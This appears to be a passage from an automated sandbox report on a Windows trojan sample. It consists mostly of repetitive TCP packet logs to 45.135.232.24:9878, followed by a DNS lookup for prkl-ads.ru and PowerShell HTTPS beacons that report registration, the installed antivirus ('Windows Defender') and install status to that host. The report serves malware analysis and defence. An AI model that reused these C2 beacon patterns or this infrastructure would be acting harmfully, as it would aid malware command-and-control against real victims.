                                                  Aug 21, 2023 19:51:33.335726023 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335743904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335761070 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336064100 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336081028 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336098909 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336116076 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336158037 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336174965 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.396404028 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397180080 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397224903 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397243977 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397260904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397471905 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397495031 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397494078 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.397512913 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397531986 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397548914 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397619963 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.397891045 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397912025 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397928953 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397945881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398076057 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398094893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398112059 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398129940 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398385048 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398405075 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398422003 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398438931 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398574114 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398591042 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398608923 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398631096 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398891926 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.399005890 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.459600925 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459657907 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459708929 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459757090 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459805012 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459850073 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459897995 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459943056 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459990025 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460624933 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460686922 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460731983 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460782051 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460829020 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460884094 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461020947 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461062908 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461110115 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461153030 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461200953 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461246967 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461296082 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461339951 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461386919 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461433887 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461478949 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461524963 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461568117 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461613894 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461657047 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461704016 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461750031 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461802006 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461843967 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461889982 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461935997 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461950064 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.461981058 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462028027 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462074041 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462090015 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.462121010 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462263107 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462306023 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462353945 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462399960 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462446928 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462491035 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462538004 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462582111 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462627888 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462733984 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462776899 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.463406086 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.463524103 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.526067019 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526124954 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526160002 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526192904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526324987 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526360035 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526443005 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526568890 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526726007 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526761055 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526823044 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526915073 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526948929 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526978970 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527013063 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527048111 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527081966 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527115107 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527148962 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527182102 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527215004 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527251005 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527285099 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527318001 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527349949 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527383089 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527416945 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527448893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527483940 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527519941 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527553082 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527780056 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.527848005 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527884007 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527918100 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527972937 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527986050 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.528112888 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528147936 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528182030 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528273106 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528459072 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528493881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528629065 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528841019 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528876066 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529206991 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529239893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529273033 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529306889 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529735088 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529767990 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529803038 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.530153990 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.530275106 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.591449976 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591505051 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591635942 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591675997 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591931105 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591965914 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592001915 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592035055 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592559099 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592597961 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592890024 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592925072 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592959881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592993975 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593214989 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593252897 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593286037 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593580008 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593616009 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593647957 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593683004 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593715906 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593926907 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.593961954 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594177961 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594211102 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594243050 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594564915 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594597101 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.594600916 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594722033 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.594896078 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594932079 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.594965935 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595160961 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595194101 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595227957 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595261097 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595293999 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595556021 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595588923 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595621109 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595880032 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595913887 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595944881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.595973969 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596007109 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596185923 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596219063 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596544027 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596577883 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596611023 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.596642017 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.597012997 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.597131968 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.656757116 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.656820059 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657120943 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657159090 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657335997 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657372952 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657706976 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657741070 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.657957077 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658113956 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658269882 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658448935 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658483028 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658643007 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658830881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658876896 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.658978939 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659190893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659285069 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659579992 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659653902 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659743071 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659797907 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.659831047 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660048962 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660131931 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660281897 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660315990 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660394907 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660479069 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.660577059 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660635948 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660777092 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660811901 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.660902977 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661094904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661129951 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661314011 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661349058 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661381960 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661415100 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661704063 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661736965 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661770105 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661906004 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.661940098 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.662026882 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.662164927 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.662254095 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.662287951 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.662323952 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.662560940 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.666559935 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.722652912 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.722688913 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.722707987 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.722820997 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.723141909 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.723165989 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.723356962 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.723470926 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.723670006 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.723927021 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724236965 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724275112 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724293947 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724395990 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724539042 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724751949 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724770069 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.724968910 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.725004911 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.725044966 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.725176096 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.725240946 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.725367069 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.725488901 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.733498096 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.788891077 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:53:53.845912933 CEST497479878192.168.2.345.135.232.24

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 21, 2023 19:50:54.260333061 CEST5209753192.168.2.38.8.8.8
                                                  Aug 21, 2023 19:50:54.291064978 CEST53520978.8.8.8192.168.2.3

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Aug 21, 2023 19:50:54.260333061 CEST192.168.2.38.8.8.80x69b4Standard query (0)prkl-ads.ruA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Aug 21, 2023 19:50:54.291064978 CEST8.8.8.8192.168.2.30x69b4No error (0)prkl-ads.ru81.177.140.69A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • prkl-ads.ru

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.34973581.177.140.69443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2023-08-21 17:50:54 UTC0OUTGET /?status=reg&key=llks74638sj&site=Test HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                  Host: prkl-ads.ru
                                                  Connection: Keep-Alive
                                                  2023-08-21 17:50:54 UTC0INHTTP/1.1 200 OK
                                                  Date: Mon, 21 Aug 2023 17:50:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                  X-Powered-By: PHP/7.4.33


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.34973681.177.140.69443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2023-08-21 17:50:56 UTC0OUTGET /?status=start&av=Windows%20Defender HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                  Host: prkl-ads.ru
                                                  2023-08-21 17:50:56 UTC0INHTTP/1.1 200 OK
                                                  Date: Mon, 21 Aug 2023 17:50:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 14
                                                  Connection: close
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                  X-Powered-By: PHP/7.4.33
                                                  2023-08-21 17:50:56 UTC0INData Raw: 34 30 34 20 48 54 54 50 20 45 72 72 6f 72
                                                  Data Ascii: 404 HTTP Error


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.34973781.177.140.69443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2023-08-21 17:50:57 UTC0OUTGET /?status=install HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                  Host: prkl-ads.ru
                                                  2023-08-21 17:50:57 UTC0INHTTP/1.1 200 OK
                                                  Date: Mon, 21 Aug 2023 17:50:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                  X-Powered-By: PHP/7.4.33


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:19:50:45
                                                  Start date:21/08/2023
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  Imagebase:0x350000
                                                  File size:7'465'048 bytes
                                                  MD5 hash:19124312CAFA0B1C5524329755A5D6A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:1
                                                  Start time:19:50:47
                                                  Start date:21/08/2023
